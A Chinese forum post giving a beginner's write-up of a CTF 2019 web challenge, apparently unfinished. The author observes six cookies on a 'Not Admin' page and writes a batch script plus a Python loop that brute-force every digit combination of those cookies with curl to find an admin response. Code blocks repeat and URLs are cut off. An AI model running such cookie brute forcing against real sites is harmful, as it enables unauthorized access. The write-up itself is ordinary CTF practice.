-
-
[原创] CTF2019-3-07 web svr wp
-
发表于:
2019-9-18 17:07
2748
-
[原创] CTF2019-3-07 web svr wp
第一次做这类的。
打开网页 http://154.8.174.214:8080/ 返回
Not Admin
。莫名其妙。
用curl 可以收发内容观察。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 | C:\Users\Administrator>C:\Windows\System32\curl.exe -i http:
HTTP/1.1 200 OK
Date: Wed, 18 Sep 2019 09:03:10 GMT
Server: Apache/2.4.18 (Ubuntu)
Set-Cookie: key0=0
Set-Cookie: key1=0
Set-Cookie: key2=0
Set-Cookie: key3=0
Set-Cookie: key4=0
Set-Cookie: key5=0
Content-Length: 9
Content-Type: text/html; charset=UTF-8
Not Admin
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 | C:\Users\Administrator>C:\Windows\System32\curl.exe -i http:
HTTP/1.1 200 OK
Date: Wed, 18 Sep 2019 09:03:10 GMT
Server: Apache/2.4.18 (Ubuntu)
Set-Cookie: key0=0
Set-Cookie: key1=0
Set-Cookie: key2=0
Set-Cookie: key3=0
Set-Cookie: key4=0
Set-Cookie: key5=0
Content-Length: 9
Content-Type: text/html; charset=UTF-8
Not Admin
|
反馈为Not Admin。中间为一些Cookie。可以尝试设置这些Cookie。
编写脚本,输入 6 个 cookie。传入。当返回改变时,输出到日志中。
1 2 3 4 5 6 7 8 | @setlocal EnableDelayedExpansion
set cmdd=C:\Windows\System32\curl.exe -b "key0=%1; key1=%2; key2=%3; key3=%4; key4=%5; key5=%6" http:
echo %cmdd%
for /F "DELIMS=-" %%I in ( '!cmdd!' ) do (
if "%%I" equ "Not Admin" ( echo ok key0=%1; key1=%2; key2=%3; key3=%4; key4=%5; key5=%6 ) else (
echo key0=%1; key1=%2; key2=%3; key3=%4; key4=%5; key5=%6 diff!! >> 111.log
)
)
|
编写Python脚本来遍历。吐槽下Python不太了解,还需要学习。
1 2 3 4 5 6 7 8 9 10 11 12 | from subprocess import run
for i in range(0, 10):
for j in range(0, 10):
for k in range(0, 10):
for l in range(0, 10):
for m in range(0, 10):
print ("{} {} {} {} {}".format(i, j, k, l, m))
for n in range(0, 10):
commd = '1.bat {} {} {} {} {} {}'.format(i,j,k,l,m,n)
#os.system(commd)
run(commd,shell=True)
|
1 2 3 4 5 6 7 8 | @setlocal EnableDelayedExpansion
set cmdd=C:\Windows\System32\curl.exe -b "key0=%1; key1=%2; key2=%3; key3=%4; key4=%5; key5=%6" http:
echo %cmdd%
for /F "DELIMS=-" %%I in ( '!cmdd!' ) do (
if "%%I" equ "Not Admin" ( echo ok key0=%1; key1=%2; key2=%3; key3=%4; key4=%5; key5=%6 ) else (
echo key0=%1; key1=%2; key2=%3; key3=%4; key4=%5; key5=%6 diff!! >> 111.log
)
)
|
编写Python脚本来遍历。吐槽下Python不太了解,还需要学习。
1 2 3 4 5 6 7 8 9 10 11 12 | from subprocess import run
for i in range(0, 10):
for j in range(0, 10):
for k in range(0, 10):
for l in range(0, 10):
for m in range(0, 10):
print ("{} {} {} {} {}".format(i, j, k, l, m))
for n in range(0, 10):
commd = '1.bat {} {} {} {} {} {}'.format(i,j,k,l,m,n)
#os.system(commd)
run(commd,shell=True)
|
1 2 3 4 5 6 7 8 9 10 11 12 | from subprocess import run
for i in range(0, 10):
for j in range(0, 10):
for k in range(0, 10):
for l in range(0, 10):
for m in range(0, 10):
print ("{} {} {} {} {}".format(i, j, k, l, m))
for n in range(0, 10):
commd = '1.bat {} {} {} {} {} {}'.format(i,j,k,l,m,n)
#os.system(commd)
run(commd,shell=True)
|
[招生]科锐逆向工程师培训(2025年3月11日实地,远程教学同时开班, 第52期)!
最后于 2019-9-18 17:20
被scpczc编辑
,原因:
